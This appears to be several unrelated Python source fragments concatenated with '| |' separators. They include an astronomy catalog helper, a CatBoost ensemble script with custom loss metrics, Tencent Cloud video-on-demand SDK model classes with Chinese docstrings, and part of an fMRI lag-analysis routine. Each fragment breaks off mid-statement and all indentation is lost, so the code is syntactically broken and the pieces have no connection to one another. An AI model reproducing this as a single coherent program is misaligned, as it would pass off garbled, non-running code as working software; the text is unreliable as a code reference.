"""
m_g = df['g_Corr_1']
m_r = df['g_Corr_1'] - df['gr_Corr_1']
m_i = df['g_Corr_1'] - df['gr_Corr_1'] - df['ri_Corr_1']
m_z = df['g_Corr_1'] - df['gr_Corr_1'] - df['ri_Corr_1'] - df['iz_Corr_1']
m_griz = []
for i in np.arange(0, len(m_g)):
m_griz.append("'("+ str(m_g[i]) + ', ' + str(m_r[i]) + ', ' + str(m_i[i]) + ', ' + str(m_z[i]) + ")'")
return m_griz
def get_catalog(cat_type, inj, realization_number, tile_name, filter_name):
"""Get catalog to analyze.
Args:
cat_type -- Catalog type. Allowed values: 'gal_truth', 'mof', 'star_truth', 'sof', 'coadd'.
inj (bool)
realization_number (str) -- Allowed values: '0' '1' '2' ...
tile_name -- Different allowed values depending on catalog.
filter_name (str) -- Only used with coadd catalogs.
Returns:
fn -- Filename
"""
if cat_type == 'gal_truth' and inj:
fn = os.path.join(BASEPATH, | |
from __future__ import division
import pandas as pd
import numpy as np
from sklearn import metrics
from sklearn.metrics import roc_auc_score
import datetime as dt
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.metrics import f1_score
from catboost import CatBoostClassifier
from catboost import Pool, CatBoostClassifier
import numpy as np
import math
from pyearth import Earth
from sklearn import linear_model
from FileManager import FileManager
from simple_lgbm import lgbmodel
from simple_lgbm import getDataB, getPrepDataB
from problogic import getPrepDataC, probpredict
le = LabelEncoder()
def auc(x, y):
return abs( np.trapz(y, x) )
class AUClossMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
approx = approxes[0]
weight_sum = 1.0
error_sum = auc( target, approx )
return error_sum, weight_sum
class HingelossMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 0.0
for i in xrange(len(approx)):
w = 1.0 if weight is None else weight[i]
weight_sum += w
error_sum += max ( 0, ( 1 - (target[i] * approx[i]) ) )
return error_sum, weight_sum
class SquaredlossMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 0.0
for i in xrange(len(approx)):
w = 1.0 if weight is None else weight[i]
weight_sum += w
error_sum += ( 1 - (target[i] * approx[i]) )**2
return error_sum, weight_sum
class LogisticMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 0.0
for i in xrange(len(approx)):
w = 1.0 if weight is None else weight[i]
weight_sum += w
error_sum += math.log( 1 + math.exp (-1 * target[i] * approx[i]) )
error_sum = error_sum / math.log(2)
return error_sum, weight_sum
def gini(actual, pred, cmpcol=0, sortcol=1):
assert (len(actual) == len(pred))
all = np.asarray(np.c_[actual, pred, np.arange(len(actual))], dtype=np.float)
all = all[np.lexsort((all[:, 2], -1 * all[:, 1]))]
totalLosses = all[:, 0].sum()
giniSum = all[:, 0].cumsum().sum() / totalLosses
giniSum -= (len(actual) + 1) / 2.
return giniSum / len(actual)
def gini_normalized(a, p):
return gini(a, p) / gini(a, a)
class GiniMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 1.0
error_sum = gini_normalized(target, approx)
return error_sum, weight_sum
def AUC(y, pred):
auc = roc_auc_score(y, pred)
return auc
def crossValidation (model, X, y, nfolds = 5 ):
nrow, ncol = X.shape
meanSize = nrow // nfolds
y = y.to_frame()
score = 0.0
meanlist = []
dataindex = []
for ind in range (0, nfolds):
start, end = ind * meanSize, (ind+1) * meanSize
dataindex.append ( (start, end) )
for ind, curind in enumerate (dataindex):
start, end = curind
nextind = ind + 1
Xcur, ycur = X.iloc[start:end, :], y[start:end]
model.fit(Xcur, ycur)
#get test
if nextind < len(dataindex):
tstart, tend = dataindex[nextind]
Xtcur, ytcur = X.iloc[tstart:tend, :], y.iloc[tstart:tend, :]
ypred = model.predict(Xtcur)
ypred = ypred.reshape( (1, len(ypred) ) )
#ytcur = ytcur.reshape( (1, len(ytcur) ) )
ypred = ypred.T
ytcur = ytcur.values
#print ytcur.shape, ypred.shape
#print type (ytcur), type( ypred )
#nmlist = ytcur.tolist()
#score = AUC( ytcur, ypred )
score = f1_score( ytcur.astype(int), ypred.astype(int), average='macro')
meanlist.append ( score )
return sum (meanlist) / len (meanlist)
def crossEnsembleValidation ( X, y, nfolds = 5, loss_function='Logloss' ):
#model = CatBoostClassifier ( iterations=400, loss_function='AUC' )
model = CatBoostClassifier( loss_function=loss_function )
nrow, ncol = X.shape
meanSize = nrow // nfolds
y = pd.to_numeric(y).tolist()
score = 0.0
meanlist = []
dataindex = []
for ind in range (0, nfolds):
start, end = ind * meanSize, (ind+1) * meanSize
dataindex.append ( (start, end) )
for ind, curind in enumerate (dataindex):
start, end = curind
nextind = ind + 1
Xcur, ycur = X[start:end], y[start:end]
model.fit(Xcur, ycur)
#get test
if nextind < len(dataindex):
tstart, tend = dataindex[nextind]
Xtcur, ytcur = X[tstart:tend], y[tstart:tend]
ypred = model.predict(Xtcur)
ypred = ypred.reshape( (1, len(ypred) ) )
ypred = ypred.T
#score = AUC( ytcur, ypred )
score = f1_score( ytcur, ypred, average='macro')
meanlist.append ( score )
return sum (meanlist) / len (meanlist)
def crossEnsembleValidationCustom ( X, y, nfolds = 5, eval_metric=None ):
model = CatBoostClassifier( eval_metric=eval_metric )
nrow, ncol = X.shape
meanSize = nrow // nfolds
y = pd.to_numeric(y).tolist()
score = 0.0
meanlist = []
dataindex = []
for ind in range (0, nfolds):
start, end = ind * meanSize, (ind+1) * meanSize
dataindex.append ( (start, end) )
for ind, curind in enumerate (dataindex):
start, end = curind
nextind = ind + 1
Xcur, ycur = X[start:end], y[start:end]
model.fit(Xcur, ycur)
#get test
if nextind < len(dataindex):
tstart, tend = dataindex[nextind]
Xtcur, ytcur = X[tstart:tend], y[tstart:tend]
ypred = model.predict(Xtcur)
ypred = ypred.reshape( (1, len(ypred) ) )
ypred = ypred.T
#score = AUC( ytcur, ypred )
score = f1_score( ytcur, ypred, average='macro')
meanlist.append ( score )
return sum (meanlist) / len (meanlist)
def label(df,var):
for i in var:
df[i]= le.fit_transform(df[i])
def date_feature(df):
var = ['registration_init_time','expiration_date']
k = ['reg','exp']
df['sub_duration'] = (df[var[1]] - df[var[0]]).dt.days
for i ,j in zip(var,k):
df[j+'_day'] = df[i].dt.day
df[j+'_weekday'] = df[i].dt.weekday
df[j+'_week'] = df[i].dt.week
df[j+'_month'] = df[i].dt.month
df[j+'_year'] =df[i].dt.year
def getDataA():
#Load data set
data_path = 'input/'
train = pd.read_csv(data_path + 'train.csv',dtype=({'msno':'category','song_id':'category', 'source_system_tab':'category',
'source_screen_name':'category','source_type':'category','target':'category'}))
test = pd.read_csv(data_path + 'test.csv',dtype=({'msno':'category','song_id':'category', 'source_system_tab':'category',
'source_screen_name':'category','source_type':'category'}))
members = pd.read_csv(data_path + 'members.csv',parse_dates=['registration_init_time','expiration_date'],dtype=({'msno':'category','gender':'category'}))
songs = pd.read_csv(data_path + 'songs.csv',dtype=({'song_id':'category','genre_ids':'category','artist_name':'category',
'composer':'category','lyricist':'category','language':'category'}))
df_train = train.merge(members,how='left',on='msno')
df_test = test.merge(members,how='left',on='msno')
df_train = df_train.merge(songs,how='left',on='song_id')
df_test = df_test.merge(songs, how='left',on='song_id')
del train,test,members,songs
cat = ['source_system_tab','source_screen_name','source_type', 'gender',
'genre_ids','artist_name','composer','lyricist','song_length','language']
def missing(df,var):
for i in var:
df[i].fillna(df[i].mode()[0], inplace=True)
missing(df_train,cat)
missing(df_test,cat)
date_feature(df_train)
date_feature(df_test)
#le = LabelEncoder()
cat = ['msno', 'song_id', 'source_system_tab', 'source_screen_name',
'source_type','gender','genre_ids','artist_name','composer',
'lyricist']
label(df_train,cat)
label(df_test,cat)
lstSet = set( ['target','registration_init_time', 'expiration_date'] )
train_cols = set (df_train.columns) - lstSet
train_cols = list (train_cols )
X = df_train[train_cols]
y = df_train['target'].apply(pd.to_numeric, errors='coerce')
lstSet = set( ['id','registration_init_time', 'expiration_date'] )
test_cols = set (df_test.columns) - lstSet
test_cols = list ( test_cols )
x_test = df_test[test_cols]
#return X, y, x_test, df_test
return X, y, x_test
def buildlevel1 ( data ):
seed = 23
modellst = []
filename = "level1Ensemble.pkl"
fObject = FileManager(filename)
if not fObject.isExist( ):
X, y = data['type1']['x'], data['type1']['y']
###add catboost here
model = CatBoostClassifier( | |
:param ObjectLibrary: 物体库选择,可选值:
<li>Default:使用默认物体库;</li>
<li>UserDefine:使用用户自定义物体库。</li>
<li>All:同时使用默认物体库和用户自定义物体库。</li>
:type ObjectLibrary: str
"""
self.Switch = None
self.ObjectLibrary = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.ObjectLibrary = params.get("ObjectLibrary")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class OcrFullTextConfigureInfo(AbstractModel):
"""文本全文本识别任务控制参数
"""
def __init__(self):
"""
:param Switch: 文本全文识别任务开关,可选值:
<li>ON:开启智能文本全文识别任务;</li>
<li>OFF:关闭智能文本全文识别任务。</li>
:type Switch: str
"""
self.Switch = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class OcrFullTextConfigureInfoForUpdate(AbstractModel):
"""文本全文本识别任务控制参数
"""
def __init__(self):
"""
:param Switch: 文本全文识别任务开关,可选值:
<li>ON:开启智能文本全文识别任务;</li>
<li>OFF:关闭智能文本全文识别任务。</li>
:type Switch: str
"""
self.Switch = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class OcrWordsConfigureInfo(AbstractModel):
"""文本关键词识别控制参数。
"""
def __init__(self):
"""
:param Switch: 文本关键词识别任务开关,可选值:
<li>ON:开启文本关键词识别任务;</li>
<li>OFF:关闭文本关键词识别任务。</li>
:type Switch: str
:param LabelSet: 关键词过滤标签,指定需要返回的关键词的标签。如果未填或者为空,则全部结果都返回。
标签个数最多 10 个,每个标签长度最多 16 个字符。
:type LabelSet: list of str
"""
self.Switch = None
self.LabelSet = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.LabelSet = params.get("LabelSet")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class OcrWordsConfigureInfoForUpdate(AbstractModel):
"""文本关键词识别控制参数。
"""
def __init__(self):
"""
:param Switch: 文本关键词识别任务开关,可选值:
<li>ON:开启文本关键词识别任务;</li>
<li>OFF:关闭文本关键词识别任务。</li>
:type Switch: str
:param LabelSet: 关键词过滤标签,指定需要返回的关键词的标签。如果未填或者为空,则全部结果都返回。
标签个数最多 10 个,每个标签长度最多 16 个字符。
:type LabelSet: list of str
"""
self.Switch = None
self.LabelSet = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.LabelSet = params.get("LabelSet")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class OutputAudioStream(AbstractModel):
"""输出的音频流信息
"""
def __init__(self):
"""
:param Codec: 音频流的编码格式,可选值:
<li>libfdk_aac:适合 mp4 文件。</li>
默认值:libfdk_aac。
:type Codec: str
:param SampleRate: 音频流的采样率,可选值:
<li>16000</li>
<li>32000</li>
<li>44100</li>
<li>48000</li>
单位:Hz。
默认值:16000。
:type SampleRate: int
:param AudioChannel: 音频声道数,可选值:
<li>1:单声道 。</li>
<li>2:双声道</li>
默认值:2。
:type AudioChannel: int
"""
self.Codec = None
self.SampleRate = None
self.AudioChannel = None
def _deserialize(self, params):
self.Codec = params.get("Codec")
self.SampleRate = params.get("SampleRate")
self.AudioChannel = params.get("AudioChannel")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class OutputVideoStream(AbstractModel):
"""输出的视频流信息
"""
def __init__(self):
"""
:param Codec: 视频流的编码格式,可选值:
<li>libx264:H.264 编码 </li>
默认值:libx264。
:type Codec: str
:param Fps: 视频帧率,取值范围:[0, 60],单位:Hz。
默认值:0,表示和第一个视频轨的第一个视频片段的视频帧率一致。
:type Fps: int
"""
self.Codec = None
self.Fps = None
def _deserialize(self, params):
self.Codec = params.get("Codec")
self.Fps = params.get("Fps")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ParseStreamingManifestRequest(AbstractModel):
"""ParseStreamingManifest请求参数结构体
"""
def __init__(self):
"""
:param MediaManifestContent: 待解析的索引文件内容。
:type MediaManifestContent: str
:param ManifestType: 视频索引文件格式。默认 m3u8 格式。
<li>m3u8</li>
<li>mpd</li>
:type ManifestType: str
"""
self.MediaManifestContent = None
self.ManifestType = None
def _deserialize(self, params):
self.MediaManifestContent = params.get("MediaManifestContent")
self.ManifestType = params.get("ManifestType")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ParseStreamingManifestResponse(AbstractModel):
"""ParseStreamingManifest返回参数结构体
"""
def __init__(self):
"""
:param MediaSegmentSet: 分片文件列表。
:type MediaSegmentSet: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.MediaSegmentSet = None
self.RequestId = None
def _deserialize(self, params):
self.MediaSegmentSet = params.get("MediaSegmentSet")
self.RequestId = params.get("RequestId")
class PlayStatFileInfo(AbstractModel):
"""播放统计文件信息
"""
def __init__(self):
"""
:param Date: 播放统计数据所属日期,使用 [ISO 日期格式](https://cloud.tencent.com/document/product/266/11732#I)。
:type Date: str
:param Url: 播放统计文件的 URL 地址。播放统计文件内容为:
<li> date:播放日期。</li>
<li> file_id:视频文件 ID。</li>
<li> ip_count:去重后的客户端 IP 数。</li>
<li> flux:播放流量,单位:字节。</li>
<li> play_times:总的播放次数。</li>
<li> pc_play_times:PC 端播放次数。</li>
<li> mobile_play_times:移动端播放次数。</li>
<li> iphone_play_times:iPhone 端播放次数。</li>
<li> android_play_times:Android 端播放次数。</li>
<li> host_name 域名。</li>
:type Url: str
"""
self.Date = None
self.Url = None
def _deserialize(self, params):
self.Date = params.get("Date")
self.Url = params.get("Url")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PlayerConfig(AbstractModel):
"""播放器配置详情
"""
def __init__(self):
"""
:param Name: 播放器配置名字。
:type Name: str
:param Type: 播放器配置类型,取值范围:
<li>Preset:系统预置配置;</li>
<li>Custom:用户自定义配置。</li>
:type Type: str
:param DrmSwitch: 播放 DRM 保护的自适应码流开关:
<li>ON:开启,表示仅播放 DRM 保护的自适应码流输出;</li>
<li>OFF:关闭,表示播放未加密的自适应码流输出。</li>
:type DrmSwitch: str
:param AdaptiveDynamicStreamingDefinition: 允许输出的未加密的自适应码流模板 ID。
:type AdaptiveDynamicStreamingDefinition: int
:param DrmStreamingsInfo: 允许输出的 DRM 自适应码流模板内容。
注意:此字段可能返回 null,表示取不到有效值。
:type DrmStreamingsInfo: :class:`tencentcloud.vod.v20180717.models.DrmStreamingsInfo`
:param ImageSpriteDefinition: 允许输出的雪碧图模板 ID。
:type ImageSpriteDefinition: int
:param ResolutionNameSet: 播放器对不于不同分辨率的子流展示名字。
:type ResolutionNameSet: list of ResolutionNameInfo
:param CreateTime: 播放器配置创建时间,使用 [ISO 日期格式](https://cloud.tencent.com/document/product/266/11732#iso-.E6.97.A5.E6.9C.9F.E6.A0.BC.E5.BC.8F)。
:type CreateTime: str
:param UpdateTime: 播放器配置最后修改时间,使用 [ISO 日期格式](https://cloud.tencent.com/document/product/266/11732#iso-.E6.97.A5.E6.9C.9F.E6.A0.BC.E5.BC.8F)。
:type UpdateTime: str
:param Domain: 播放时使用的域名。值为 Default,表示使用[默认分发配置](https://cloud.tencent.com/document/product/266/33373)中的域名。
:type Domain: str
:param Scheme: 播放时使用的 Scheme。取值范围:
<li>Default:使用[默认分发配置](https://cloud.tencent.com/document/product/266/33373)中的 Scheme;</li>
<li>HTTP;</li>
<li>HTTPS。</li>
:type Scheme: str
:param Comment: 模板描述信息。
:type Comment: str
"""
self.Name = None
self.Type = None
self.DrmSwitch = None
self.AdaptiveDynamicStreamingDefinition = None
self.DrmStreamingsInfo = None
self.ImageSpriteDefinition = None
self.ResolutionNameSet = None
self.CreateTime = None
self.UpdateTime = None
self.Domain = None
self.Scheme = None
self.Comment = None
def _deserialize(self, params):
self.Name = params.get("Name")
self.Type = params.get("Type")
self.DrmSwitch = params.get("DrmSwitch")
self.AdaptiveDynamicStreamingDefinition = params.get("AdaptiveDynamicStreamingDefinition")
if params.get("DrmStreamingsInfo") is not None:
self.DrmStreamingsInfo = DrmStreamingsInfo()
self.DrmStreamingsInfo._deserialize(params.get("DrmStreamingsInfo"))
self.ImageSpriteDefinition = params.get("ImageSpriteDefinition")
if params.get("ResolutionNameSet") is not None:
self.ResolutionNameSet = []
for item in params.get("ResolutionNameSet"):
obj = ResolutionNameInfo()
obj._deserialize(item)
self.ResolutionNameSet.append(obj)
self.CreateTime = params.get("CreateTime")
self.UpdateTime = params.get("UpdateTime")
self.Domain = params.get("Domain")
self.Scheme = params.get("Scheme")
self.Comment = params.get("Comment")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PoliticalAsrReviewTemplateInfo(AbstractModel):
"""语音鉴政任务控制参数
"""
def __init__(self):
"""
:param Switch: 语音鉴政任务开关,可选值:
<li>ON:开启语音鉴政任务;</li>
<li>OFF:关闭语音鉴政任务。</li>
:type Switch: str
:param BlockConfidence: 判定涉嫌违规的分数阈值,当智能审核达到该分数以上,认为涉嫌违规,不填默认为 100 分。取值范围:0~100。
:type BlockConfidence: int
:param ReviewConfidence: 判定需人工复核是否违规的分数阈值,当智能审核达到该分数以上,认为需人工复核,不填默认为 75 分。取值范围:0~100。
:type ReviewConfidence: int
"""
self.Switch = None
self.BlockConfidence = None
self.ReviewConfidence = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.BlockConfidence = params.get("BlockConfidence")
self.ReviewConfidence = params.get("ReviewConfidence")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PoliticalAsrReviewTemplateInfoForUpdate(AbstractModel):
"""语音鉴政任务控制参数。
"""
def __init__(self):
"""
:param Switch: 语音鉴政任务开关,可选值:
<li>ON:开启语音鉴政任务;</li>
<li>OFF:关闭语音鉴政任务。</li>
:type Switch: str
:param BlockConfidence: 判定涉嫌违规的分数阈值,当智能审核达到该分数以上,认为涉嫌违规。取值范围:0~100。
:type BlockConfidence: int
:param ReviewConfidence: 判定需人工复核是否违规的分数阈值,当智能审核达到该分数以上,认为需人工复核。取值范围:0~100。
:type ReviewConfidence: int
"""
self.Switch = None
self.BlockConfidence = None
self.ReviewConfidence = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.BlockConfidence = params.get("BlockConfidence")
self.ReviewConfidence = params.get("ReviewConfidence")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PoliticalConfigureInfo(AbstractModel):
"""鉴政任务控制参数
"""
def __init__(self):
"""
:param ImgReviewInfo: 画面鉴政控制参数。
注意:此字段可能返回 null,表示取不到有效值。
:type ImgReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalImgReviewTemplateInfo`
:param AsrReviewInfo: 语音鉴政控制参数。
注意:此字段可能返回 null,表示取不到有效值。
:type AsrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalAsrReviewTemplateInfo`
:param OcrReviewInfo: 文本鉴政控制参数。
注意:此字段可能返回 null,表示取不到有效值。
:type OcrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalOcrReviewTemplateInfo`
"""
self.ImgReviewInfo = None
self.AsrReviewInfo = None
self.OcrReviewInfo = None
def _deserialize(self, params):
if params.get("ImgReviewInfo") is not None:
self.ImgReviewInfo = PoliticalImgReviewTemplateInfo()
self.ImgReviewInfo._deserialize(params.get("ImgReviewInfo"))
if params.get("AsrReviewInfo") is not None:
self.AsrReviewInfo = PoliticalAsrReviewTemplateInfo()
self.AsrReviewInfo._deserialize(params.get("AsrReviewInfo"))
if params.get("OcrReviewInfo") is not None:
self.OcrReviewInfo = PoliticalOcrReviewTemplateInfo()
self.OcrReviewInfo._deserialize(params.get("OcrReviewInfo"))
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PoliticalConfigureInfoForUpdate(AbstractModel):
"""鉴政任务控制参数。
"""
def __init__(self):
"""
:param ImgReviewInfo: 画面鉴政控制参数。
:type ImgReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalImgReviewTemplateInfoForUpdate`
:param AsrReviewInfo: 语音鉴政控制参数。
:type AsrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalAsrReviewTemplateInfoForUpdate`
:param OcrReviewInfo: 文本鉴政控制参数。
:type OcrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalOcrReviewTemplateInfoForUpdate`
"""
self.ImgReviewInfo = None
self.AsrReviewInfo = None
self.OcrReviewInfo = None
def _deserialize(self, params):
if params.get("ImgReviewInfo") is not None:
self.ImgReviewInfo = PoliticalImgReviewTemplateInfoForUpdate()
self.ImgReviewInfo._deserialize(params.get("ImgReviewInfo"))
if params.get("AsrReviewInfo") is not None:
self.AsrReviewInfo = PoliticalAsrReviewTemplateInfoForUpdate()
self.AsrReviewInfo._deserialize(params.get("AsrReviewInfo"))
if params.get("OcrReviewInfo") is not None:
self.OcrReviewInfo = PoliticalOcrReviewTemplateInfoForUpdate()
self.OcrReviewInfo._deserialize(params.get("OcrReviewInfo"))
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PoliticalImgReviewTemplateInfo(AbstractModel):
"""画面鉴政任务控制参数
"""
def __init__(self):
"""
:param Switch: 画面鉴政任务开关,可选值:
<li>ON:开启画面鉴政任务;</li>
<li>OFF:关闭画面鉴政任务。</li>
:type Switch: str
:param LabelSet: 画面鉴政过滤标签,审核结果包含选择的标签则返回结果,如果过滤标签为空,则审核结果全部返回,可选值为:
<li>violation_photo:违规图标;</li>
<li>politician:政治人物;</li>
<li>entertainment:娱乐人物;</li>
<li>sport:体育人物;</li>
<li>entrepreneur:商业人物;</li>
<li>scholar:教育学者;</li>
<li>celebrity:知名人物;</li>
<li>military:军事人物。</li>
:type LabelSet: list of str
:param BlockConfidence: 判定涉嫌违规的分数阈值,当智能审核达到该分数以上,认为涉嫌违规,不填默认为 97 分。取值范围:0~100。
:type BlockConfidence: int
:param ReviewConfidence: 判定需人工复核是否违规的分数阈值,当智能审核达到该分数以上,认为需人工复核,不填默认为 95 分。取值范围:0~100。
:type ReviewConfidence: int
"""
self.Switch = None
self.LabelSet = None
self.BlockConfidence = None
self.ReviewConfidence = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.LabelSet = params.get("LabelSet")
self.BlockConfidence = params.get("BlockConfidence")
self.ReviewConfidence = params.get("ReviewConfidence")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class PoliticalImgReviewTemplateInfoForUpdate(AbstractModel):
"""画面鉴政任务控制参数。
"""
def __init__(self):
"""
:param Switch: 画面鉴政任务开关,可选值:
<li>ON:开启画面鉴政任务;</li>
<li>OFF:关闭画面鉴政任务。</li>
:type Switch: str
:param LabelSet: 画面鉴政过滤标签,审核结果包含选择的标签则返回结果,如果过滤标签为空,则审核结果全部返回,可选值为:
<li>violation_photo:违规图标;</li>
<li>politician:政治人物;</li>
<li>entertainment:娱乐人物;</li>
<li>sport:体育人物;</li>
<li>entrepreneur:商业人物;</li>
<li>scholar:教育学者;</li>
<li>celebrity:知名人物;</li>
<li>military:军事人物。</li>
:type LabelSet: list of str
:param BlockConfidence: 判定涉嫌违规的分数阈值,当智能审核达到该分数以上,认为涉嫌违规。取值范围:0~100。
:type BlockConfidence: int
:param ReviewConfidence: 判定需人工复核是否违规的分数阈值,当智能审核达到该分数以上,认为需人工复核。取值范围:0~100。
:type ReviewConfidence: int
"""
self.Switch = None
self.LabelSet = None
self.BlockConfidence = None
self.ReviewConfidence = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.LabelSet = params.get("LabelSet")
self.BlockConfidence = params.get("BlockConfidence")
self.ReviewConfidence = params.get("ReviewConfidence")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
| |
timestep"
)
else:
if nim_hdr.get_xyzt_units()[1] == "msec":
fmritr = thesizes[4] / 1000.0
else:
fmritr = thesizes[4]
if optiondict["realtr"] > 0.0:
fmritr = optiondict["realtr"]
# check to see if we need to adjust the oversample factor
if optiondict["oversampfactor"] < 0:
optiondict["oversampfactor"] = int(np.max([np.ceil(fmritr / 0.5), 1]))
LGR.info(f"oversample factor set to {optiondict['oversampfactor']}")
oversamptr = fmritr / optiondict["oversampfactor"]
LGR.verbose(f"fmri data: {timepoints} timepoints, tr = {fmritr}, oversamptr = {oversamptr}")
LGR.info(f"{numspatiallocs} spatial locations, {timepoints} timepoints")
TimingLGR.info("Finish reading fmrifile")
# if the user has specified start and stop points, limit check, then use these numbers
validstart, validend = tide_util.startendcheck(
timepoints, optiondict["startpoint"], optiondict["endpoint"]
)
if abs(optiondict["lagmin"]) > (validend - validstart + 1) * fmritr / 2.0:
raise ValueError(
f"magnitude of lagmin exceeds {(validend - validstart + 1) * fmritr / 2.0} - invalid"
)
if abs(optiondict["lagmax"]) > (validend - validstart + 1) * fmritr / 2.0:
raise ValueError(
f"magnitude of lagmax exceeds {(validend - validstart + 1) * fmritr / 2.0} - invalid"
)
# do spatial filtering if requested
if optiondict["gausssigma"] < 0.0 and not optiondict["textio"]:
# set gausssigma automatically
optiondict["gausssigma"] = np.mean([xdim, ydim, slicethickness]) / 2.0
if optiondict["gausssigma"] > 0.0:
LGR.info(
f"applying gaussian spatial filter to timepoints {validstart} "
f"to {validend} with sigma={optiondict['gausssigma']}"
)
reportstep = 10
for i in range(validstart, validend + 1):
if (i % reportstep == 0 or i == validend) and optiondict["showprogressbar"]:
tide_util.progressbar(
i - validstart + 1,
validend - validstart + 1,
label="Percent complete",
)
nim_data[:, :, :, i] = tide_filt.ssmooth(
xdim,
ydim,
slicethickness,
optiondict["gausssigma"],
nim_data[:, :, :, i],
)
print()
TimingLGR.info("End 3D smoothing")
# reshape the data and trim to a time range, if specified. Check for special case of no trimming to save RAM
